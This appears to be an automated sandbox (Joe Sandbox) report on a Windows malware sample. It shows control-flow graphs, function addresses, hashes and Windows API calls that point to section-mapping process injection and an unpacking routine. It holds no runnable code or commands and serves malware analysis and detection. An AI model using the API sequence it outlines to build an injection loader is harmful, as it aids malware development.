                                control_flow_graph 213 4014de-4014ed 214 401563 213->214 215 4014ef 213->215 216 40156a-401590 call 4011b7 214->216 217 401551-401552 215->217 218 4014f1-401502 215->218 236 401592 216->236 237 401595-40159a 216->237 217->214 220 401504-401516 218->220 221 40151d-40152d 218->221 223 40151b-40151c 220->223 226 4014ba 221->226 227 40152f-401535 221->227 223->221 229 401447-401456 226->229 230 4014bc-4014c3 226->230 238 40144c-401470 229->238 233 4014c5-4014c8 230->233 234 401539-401567 230->234 239 4014cf 233->239 234->216 251 401558-401560 234->251 236->237 249 4015a0-4015b1 237->249 250 4018b8-4018c0 237->250 252 401473-401484 238->252 242 4014d6 239->242 242->242 246 4014d8 242->246 246->223 258 4018b6-4018c5 249->258 259 4015b7-4015e0 249->259 250->237 251->214 257 40147b-4014a5 call 4011b7 252->257 257->223 270 4014a7 257->270 265 4018da 258->265 266 4018cb-4018d6 258->266 259->258 272 4015e6-4015fd NtDuplicateObject 259->272 265->266 268 4018dd-401915 call 4011b7 265->268 266->268 270->239 273 4014a9-4014b5 270->273 272->258 275 401603-401627 NtCreateSection 272->275 276 401471-401472 273->276 277 4014b7-4014b8 273->277 279 401683-4016a9 NtCreateSection 275->279 280 401629-40164a NtMapViewOfSection 275->280 276->252 277->226 281 401449 277->281 279->258 286 4016af-4016b3 279->286 280->279 285 40164c-401668 NtMapViewOfSection 280->285 281->257 284 40144b 281->284 284->238 285->279 287 40166a-401680 285->287 286->258 288 4016b9-4016da NtMapViewOfSection 286->288 287->279 288->258 291 4016e0-4016fc NtMapViewOfSection 288->291 291->258 294 401702 call 401707 291->294
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectView
                                • String ID:
                                • API String ID: 1652636561-0
                                • Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                • Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
                                • Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                • Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24
                                Function 00401543 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 296 401543-401544 297 401546-401567 296->297 298 4015af-4015b1 296->298 305 401558-401563 297->305 306 40156a-401590 call 4011b7 297->306 300 4018b6-4018c5 298->300 301 4015b7-4015e0 298->301 307 4018da 300->307 308 4018cb-4018d6 300->308 301->300 316 4015e6-4015fd NtDuplicateObject 301->316 305->306 326 401592 306->326 327 401595-40159a 306->327 307->308 311 4018dd-401915 call 4011b7 307->311 308->311 316->300 319 401603-401627 NtCreateSection 316->319 322 401683-4016a9 NtCreateSection 319->322 323 401629-40164a NtMapViewOfSection 319->323 322->300 329 4016af-4016b3 322->329 323->322 328 40164c-401668 NtMapViewOfSection 323->328 326->327 338 4015a0-4015ad 327->338 339 4018b8-4018c0 327->339 328->322 330 40166a-401680 328->330 329->300 331 4016b9-4016da NtMapViewOfSection 329->331 330->322 331->300 335 4016e0-4016fc NtMapViewOfSection 331->335 335->300 340 401702 call 401707 335->340 338->298 339->327
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                • Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
                                • Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                • Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64
                                Function 00401565 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 344 401565-401590 call 4011b7 349 401592 344->349 350 401595-40159a 344->350 349->350 352 4015a0-4015b1 350->352 353 4018b8-4018c0 350->353 357 4018b6-4018c5 352->357 358 4015b7-4015e0 352->358 353->350 361 4018da 357->361 362 4018cb-4018d6 357->362 358->357 366 4015e6-4015fd NtDuplicateObject 358->366 361->362 363 4018dd-401915 call 4011b7 361->363 362->363 366->357 368 401603-401627 NtCreateSection 366->368 370 401683-4016a9 NtCreateSection 368->370 371 401629-40164a NtMapViewOfSection 368->371 370->357 375 4016af-4016b3 370->375 371->370 374 40164c-401668 NtMapViewOfSection 371->374 374->370 376 40166a-401680 374->376 375->357 377 4016b9-4016da NtMapViewOfSection 375->377 376->370 377->357 380 4016e0-4016fc NtMapViewOfSection 377->380 380->357 383 401702 call 401707 380->383
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                • Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
                                • Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                • Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64
                                Function 00401579 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 385 401579-401590 call 4011b7 391 401592 385->391 392 401595-40159a 385->392 391->392 394 4015a0-4015b1 392->394 395 4018b8-4018c0 392->395 399 4018b6-4018c5 394->399 400 4015b7-4015e0 394->400 395->392 403 4018da 399->403 404 4018cb-4018d6 399->404 400->399 408 4015e6-4015fd NtDuplicateObject 400->408 403->404 405 4018dd-401915 call 4011b7 403->405 404->405 408->399 410 401603-401627 NtCreateSection 408->410 412 401683-4016a9 NtCreateSection 410->412 413 401629-40164a NtMapViewOfSection 410->413 412->399 417 4016af-4016b3 412->417 413->412 416 40164c-401668 NtMapViewOfSection 413->416 416->412 418 40166a-401680 416->418 417->399 419 4016b9-4016da NtMapViewOfSection 417->419 418->412 419->399 422 4016e0-4016fc NtMapViewOfSection 419->422 422->399 425 401702 call 401707 422->425
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                • Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
                                • Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                • Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64
                                Function 0040157C Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 427 40157c-401590 call 4011b7 431 401592 427->431 432 401595-40159a 427->432 431->432 434 4015a0-4015b1 432->434 435 4018b8-4018c0 432->435 439 4018b6-4018c5 434->439 440 4015b7-4015e0 434->440 435->432 443 4018da 439->443 444 4018cb-4018d6 439->444 440->439 448 4015e6-4015fd NtDuplicateObject 440->448 443->444 445 4018dd-401915 call 4011b7 443->445 444->445 448->439 450 401603-401627 NtCreateSection 448->450 452 401683-4016a9 NtCreateSection 450->452 453 401629-40164a NtMapViewOfSection 450->453 452->439 457 4016af-4016b3 452->457 453->452 456 40164c-401668 NtMapViewOfSection 453->456 456->452 458 40166a-401680 456->458 457->439 459 4016b9-4016da NtMapViewOfSection 457->459 458->452 459->439 462 4016e0-4016fc NtMapViewOfSection 459->462 462->439 465 401702 call 401707 462->465
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                • Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
                                • Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                • Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64
                                Function 00402FE9 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 467 402fe9-40300d 468 403140-403145 467->468 469 403013-40302b 467->469 469->468 470 403031-403042 469->470 471 403044-40304d 470->471 472 403052-403060 471->472 472->472 473 403062-403069 472->473 474 40308b-403092 473->474 475 40306b-40308a 473->475 476 4030b4-4030b7 474->476 477 403094-4030b3 474->477 475->474 478 4030c0 476->478 479 4030b9-4030bc 476->479 477->476 478->471 481 4030c2-4030c7 478->481 479->478 480 4030be 479->480 480->481 481->468 482 4030c9-4030cc 481->482 482->468 483 4030ce-40313d RtlCreateUserThread NtTerminateProcess 482->483 483->468
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: CreateProcessTerminateThreadUser
                                • String ID:
                                • API String ID: 1921587553-0
                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                • Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                • Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5
                                Function 0445003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 445003c-4450047 1 445004c-4450263 call 4450a3f call 4450e0f call 4450d90 VirtualAlloc 0->1 2 4450049 0->2 17 4450265-4450289 call 4450a69 1->17 18 445028b-4450292 1->18 2->1 23 44502ce-44503c2 VirtualProtect call 4450cce call 4450ce7 17->23 20 44502a1-44502b0 18->20 22 44502b2-44502cc 20->22 20->23 22->20 29 44503d1-44503e0 23->29 30 44503e2-4450437 call 4450ce7 29->30 31 4450439-44504b8 VirtualFree 29->31 30->29 33 44505f4-44505fe 31->33 34 44504be-44504cd 31->34 37 4450604-445060d 33->37 38 445077f-4450789 33->38 36 44504d3-44504dd 34->36 36->33 40 44504e3-4450505 36->40 37->38 43 4450613-4450637 37->43 41 44507a6-44507b0 38->41 42 445078b-44507a3 38->42 52 4450517-4450520 40->52 53 4450507-4450515 40->53 44 44507b6-44507cb 41->44 45 445086e-44508be LoadLibraryA 41->45 42->41 46 445063e-4450648 43->46 49 44507d2-44507d5 44->49 51 44508c7-44508f9 45->51 46->38 47 445064e-445065a 46->47 47->38 50 4450660-445066a 47->50 54 4450824-4450833 49->54 55 44507d7-44507e0 49->55 58 445067a-4450689 50->58 60 4450902-445091d 51->60 61 44508fb-4450901 51->61 62 4450526-4450547 52->62 53->62 59 4450839-445083c 54->59 56 44507e4-4450822 55->56 57 44507e2 55->57 56->49 57->54 64 4450750-445077a 58->64 65 445068f-44506b2 58->65 59->45 66 445083e-4450847 59->66 61->60 63 445054d-4450550 62->63 67 4450556-445056b 63->67 68 44505e0-44505ef 63->68 64->46 69 44506b4-44506ed 65->69 70 44506ef-44506fc 65->70 71 4450849 66->71 72 445084b-445086c 66->72 74 445056d 67->74 75 445056f-445057a 67->75 68->36 69->70 76 44506fe-4450748 70->76 77 445074b 70->77 71->45 72->59 74->68 78 445057c-4450599 75->78 79 445059b-44505bb 75->79 76->77 77->58 84 44505bd-44505db 78->84 79->84 84->63
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0445024D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2006818821.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4450000_crwjtgt.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: cess$kernel32.dll
                                • API String ID: 4275171209-1230238691
                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                • Instruction ID: 09f078285591fc1ae939972d61dd71f046e053f31556f125d86c3d59f488bc5c
                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                • Instruction Fuzzy Hash: 92525C74A01229DFDF64CF58C985B99BBB1BF09304F1480DAE94DA7362DB30AA85DF14
                                Function 02888DBD Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 484 2888dbd-2888dd6 485 2888dd8-2888dda 484->485 486 2888ddc 485->486 487 2888de1-2888ded CreateToolhelp32Snapshot 485->487 486->487 488 2888dfd-2888e0a Module32First 487->488 489 2888def-2888df5 487->489 490 2888e0c-2888e0d call 2888a7c 488->490 491 2888e13-2888e1b 488->491 489->488 494 2888df7-2888dfb 489->494 495 2888e12 490->495 494->485 494->488 495->491
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02888DE5
                                • Module32First.KERNEL32(00000000,00000224), ref: 02888E05
                                Memory Dump Source
                                • Source File: 00000005.00000002.2006696706.0000000002882000.00000040.00000020.00020000.00000000.sdmp, Offset: 02882000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2882000_crwjtgt.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                • String ID:
                                • API String ID: 3833638111-0
                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction ID: e7f74452260d36bf1899aedcae3627fcbd8f3977a265e3b4f025159734a57b75
                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction Fuzzy Hash: C0F0903E2007196BD7203BF9A88CBAF76E8AF49625F500528E646D20C1EB70F8458A61
                                Function 04450E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 497 4450e0f-4450e24 SetErrorMode * 2 498 4450e26 497->498 499 4450e2b-4450e2c 497->499 498->499
                                APIs
                                • SetErrorMode.KERNELBASE(00000400,?,?,04450223,?,?), ref: 04450E19
                                • SetErrorMode.KERNELBASE(00000000,?,?,04450223,?,?), ref: 04450E1E
                                Memory Dump Source
                                • Source File: 00000005.00000002.2006818821.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4450000_crwjtgt.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorMode
                                • String ID:
                                • API String ID: 2340568224-0
                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                • Instruction ID: 231d8dcc9bbbe149d75c6bb025ebadce50d7a805dac6747de79212f33f9b2907
                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                • Instruction Fuzzy Hash: 58D0123514512877DB002A94DC09BCE7B1CDF05B62F108011FB0DD9181C770954046E5
                                Function 00401918 Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 592 401918-401943 597 401946-40197b call 4011b7 Sleep call 40143e 592->597 598 40193a-40193f 592->598 606 40198a-4019d3 call 4011b7 597->606 607 40197d-401985 call 401538 597->607 598->597 607->606
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                • Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
                                • Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                • Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F
                                Function 00401924 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 621 401924-401943 625 401946-40197b call 4011b7 Sleep call 40143e 621->625 626 40193a-40193f 621->626 634 40198a-4019d3 call 4011b7 625->634 635 40197d-401985 call 401538 625->635 626->625 635->634
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                • Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
                                • Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                • Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F
                                Function 02888A7C Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02888ACD
                                Memory Dump Source
                                • Source File: 00000005.00000002.2006696706.0000000002882000.00000040.00000020.00020000.00000000.sdmp, Offset: 02882000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2882000_crwjtgt.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction ID: 40706c7d5536cfad38cb8adf8dfd42bf4bc93814d405de0623d27319ead51632
                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction Fuzzy Hash: 57113C79A00208EFDB01DF98C985E98BBF5AF48351F058094F948AB361D371EA50DF80
                                Function 00401941 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                • Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
                                • Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                • Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F
                                Function 00401954 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                • Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
                                • Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                • Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F
                                Function 0040194C Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000005.00000002.2005452469.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_crwjtgt.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                • Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
                                • Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                • Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F